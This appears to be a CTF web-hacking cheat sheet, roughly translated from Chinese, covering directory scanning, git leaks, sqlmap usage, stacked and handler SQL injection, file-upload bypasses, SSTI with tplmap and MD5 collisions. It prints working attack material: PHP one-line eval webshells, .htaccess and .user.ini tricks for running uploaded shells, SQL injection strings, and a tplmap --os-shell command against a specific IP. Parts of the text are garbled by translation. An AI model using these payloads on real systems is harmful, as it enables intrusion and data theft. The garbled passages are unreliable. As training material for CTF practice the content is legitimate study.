CTF-Web Penetration (Getting Started|Notes|Tools)

Bypass various vulnerabilities in php

Portal: https://cloud.tencent.com/developer/article/2127498

php pseudo-protocol

Detailed blog explanation:

https://blog.csdn.net/cosmoslin/article/details/120695429

http://hummer.vin/2022/05/10/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE/

https://www.cnblogs.com/wjrblogs/p/12285202.html

already offline to local

It is probably to bypass the filtering information of some files containing functions, such as after base64encryption

background scan

dirsearch

• scan target

-u,--url                    目标url
-l,--url-list=FILE          目标url文件路径 
--stdin                     从标准输入中指定url
--cidr                      目标网段
--raw=File                  从文件中读取request报文,通过-schema指定策略(如--schema https)

• Scanned dictionary type

-e,--extensions             包含的文件拓展名(逗号分隔)  如-e php,asp  
-X,--exclude-extensions     排除的文件拓展名(逗号分隔)  如-X asp,jsp
-f,--force-extensions       在字典的每条记录后面添加文件拓展名

dirsearch默认只会替换字典中%EXT%为指定的extensions 
如-e php  Wishlist.%EXT%-->Wishlist.php

• dictionary format

-w,--wordlists              自定义wordlist(以逗号分隔)
--prefixes                  添加自定义前缀
--suffixes			        添加自定义后缀
--only-selected      	    筛选出指定的文件拓展名或无文件拓展名的目录
--remove-extensions   	    移除所有wordlist的后缀名 (admin.php --> admin)
-U, --uppercase      	    将字典转换为大写
-L, --lowercase		 	    将字典转换为小写
-C, --capital        	    第一个字母大写剩下字母小写

• Filtering of response results

-i                    		保留的响应状态码(以逗号分隔,支持指定范围) 如(-i 200,300-399)
-x                    		排除的响应状态码(以逗号分隔,支持指定范围)  如(-x 301,500-599)
--exclude-sizes             通过大小排除(以逗号分隔) 如(123B,4KB)
--exclude-texts     		通过文本内容排除响应('Not found', 'Error')
--exclude-regexps  			通过正则匹配排除响应('Not foun[a-z]{1}', '^Error$')
--exclude-redirects 		通过正则跳转目标排除响应('https://okta.com/*')
--minimal 					最小响应报文长度
--maximal 					最大响应报文长度

• Request related settings

-m,--http-method    	    HTTP请求方法 默认为GET
-d,--data   				HTTP请求数据
-H,--header  				请求头 如(-H 'Referer: example.com' -H 'Accept: */*')
--header-list=FILE  		从文件中读取请求头
-F,--follow-redirects  	    跟随HTTP跳转
--user-agent  			    设置user-agent字段
--cookie  				 	设置cookie

• Connection related settings

--timeout=TIMEOUT     		连接超时时间
--ip=IP   					服务器ip地址
-s DELAY, --delay=DELAY     每次请求间隔的时间
--proxy=PROXY   			代理url 支持HTTP和SOCKS代理 如(localhost:8080, socks5://localhost:8088)
--proxy-list=FILE 		    包含代理服务器的地址
--matches-proxy=PROXY       Proxy to replay with found paths
--scheme   					默认的策略 用于从文件中导入请求或url中不包含协议
--max-retries 			    最大重连次数
-b,--request-by-hostname 	强制通过域名连接，(默认为了速度,使用ip连接)
--exit-on-error    		    出现错误时退出
--debug					    Debug模式

• general settings

--version  显示dirsearch的版本
-h --help   帮助提示
-r,--recursive        	    递归爆破
-R,--recursion-depth  		最大递归的层数
-t,--threads         		线程数
--subdirs             		扫描子目录 如(admin/ 则www.example.com/admin/+字典)
--exclude-subdirs     		在递归扫描中排除的子目录
-q,--quiet-mode             安静模式
--full-url                  打印出完整的url
--no-color                  无颜色输出信息

• output mode

--simple-report=OUTPUTFILE
--plain-text-report=OUTPUTFILE
--json-report=OUTPUTFILE
--xml-report=OUTPUTFILE
--markdown-report=OUTPUTFILE
--csv-report=OUTPUTFILE

Common usage:

simple usage

• Scan target url with default settings
  python3 dirsearch.py -u https://target
• Scan the target url with a dictionary whose file extension is php, html, js
  python3 dirsearch.py -e php,html,js -u https://target
• Scan the target url by using the wordlist with the specified path and the dictionary with the extension name php, html, js
  python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist
• recursive scanpython3 dirsearch.py -e php,html,js -u https://target -r
• Set the number of recursive layers to 3
  python3 dirsearch.py -e php,html,js -u https://target -r -R 3
• Specify the thread (it is not recommended to adjust the number of threads too large, which may affect the scanning results)
  python3 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30
• use prefix suffix
  python3 dirsearch.py -e php -u https://target --prefixes .,admin,_,~(prefix)

For more information, please refer to: https://blog.csdn.net/qq_43936524/article/details/115271837

version leak

git leak

You can GitHackdownload the project code, and then we conduct code audit, using the command as follows:
GitHack.py http://www.openssl.org(目标网址)/.git/

SQL injection

sqli-labsNotes: https://acmer.blog.csdn.net/article/details/127851636

offline to local

sqlmapCommon commands:

sqlmap -u “注入地址” -v 1 –-dbs # 列举数据库
sqlmap -u “注入地址” -v 1 –-current-db # 当前数据库
sqlmap -u “注入地址” -v 1 –-users # 列数据库用户
sqlmap -u “注入地址” -v 1 -D “数据库” –-tables # 列举数据库的表名
sqlmap.py -u “注入地址” -v 1 -T “表名” -D “数据库” –-columns # 获取表的列名
sqlmap.py -u “注入地址” -v 1 -T “表名” -D “数据库” -C “字段” –-dump # 获取表中的数据

points of attention

• B: Boolean-based-blind (Boolean injection)

• U: Union query-based (joint injection)

• E: Error-based (error-based injection)

• S: Starked queries (this parameter must be used to read the file system, operating system, and registry through sqlmap, and multi-statement query injection can be used)

• T: Time-based blind (based on time delay injection)

• -–batchRun by default

• --dbsBlasting database

• -–techniqueSpecifies the detection technique used by sqlmap

sqlmap -u "http://localhost/Less-1/?id=1" --dbs --batch --technique B

It stands to reason that all types of injection should be run once

• If sometimes the injection point exists, but some other statements cannot be executed, it may be that the keyword is filtered. At this time, we need to consider bypassing by capitalization or double writing, such as common selectfiltering

Stack injection process

Execute multiple statements through the terminator;
such as -1';show databases;#Check all database names
-1';show tables;#Check the database table to find the table name under the available database
or -1';show tables from datebase_name
For the case where union select is disabled 2
-1';show columns from table_name;#check the field name and note that the table name is directly expressed without adding ''
last -1'; you can use sel/**/ect in the select
flag from request table_name
filter

Sample questions: https://buuoj.cn/challenges#[GYCTF2020]Blacklist

Also need to look at the following handler bypass

the rest bypass

• mysqlWhen querying non-existing data, virtual data will be automatically constructed, and general data storage is either plain text orMD5

For example: https://buuoj.cn/challenges#[GXYCTF2019]BabySQli

handler bypass

grammar:

handler [table_name] open;
handler [table_name] read first;
handler [table_name] read next;

eg: 1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;

XSS injection

See XSS-labs: https://acmer.blog.csdn.net/article/details/127578322

offline to local

XSS breakthrough: https://blog.csdn.net/m_de_g/article/details/119085955

offline to local

Contains sandbox escape, xss template injection

File Upload Vulnerability

.user.ini

There are files in the directory that needs to be uploaded php, and then upload a sentence of Trojan horse (here may need to capture and change the package, there may be filtering), and then use Ant Sword to link phpthe file, do not link the Trojan horse
Format:

GIF89a
auto_prepend_file=number.png

.htaccess

<FileMatch "digit-shell.png">
SetHandler application/x-httpd-php
</FileMatch>

one word trojan horse

• version-1

<?php @eval($_POST[123]);?>

• version-2

GIF89a
<?php @eval($_POST['shell']);?>

• version-3

GIF89a
<script language='php'>eval($_POST['shell']);</script>

• version-4

picture horse

The content is too big, and it is garbled, so I won't put it up

php serialization and deserialization

This is mainly to test phpthe magic function of a class, and the notes are in the ctf-toollocal

md5 bypass

https://blog.csdn.net/LYJ20010728/article/details/116779357

Offline to local

MD5 strong collision

if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    
    
        die("success!);
}

Param1 = %4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
Param2 =%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

SSTI template injection

https://blog.csdn.net/weixin_53150482/article/details/125842465
The blog has been offline to the local

A comparison 傻瓜tool:tplmap

Installation tutorial: https://www.cnblogs.com/ktsm/p/15691652.html

Instructions:

• probe injection point
  python2 tplmap.py -u 'http://114.67.175.224:11338/?flag'

• Obtainshell
python2 tplmap.py -u 'http://114.67.175.224:11338/?flag' --os-shell

After obtaining the permission, we will scan flagthe relevant files that may exist, and then make a specific analysis

---

Sometimes there may be no clues in the file, so take a look env, maybe it is inside:

Sample question: https://buuoj.cn/challenges#[Flask]SSTI

backup file

.index.php.swp

robots.txt

index.php~

index.php.bak

flask session forgery

https://blog.csdn.net/since_2020/article/details/119543172

already offline

Example: https://buuoj.cn/challenges#[%E7%AC%AC%E4%B8%80%E7%AB%A0%20web%E5%85%A5%E9%97%A8]afr_3

Commonly used headers

• Refer
• Origin
• User-Agent
• X-Forwarded-For
• X-Real-IP
• cookie

Web-tool

download link:

Link: https://pan.baidu.com/s/10lu7wSBREUa3-NreeOquIw
Extraction code: sa6d
– share from super member V3 of Baidu Netdisk

This toolkit is used by the author, and it also contains some notes and materials, you can download it if you need it~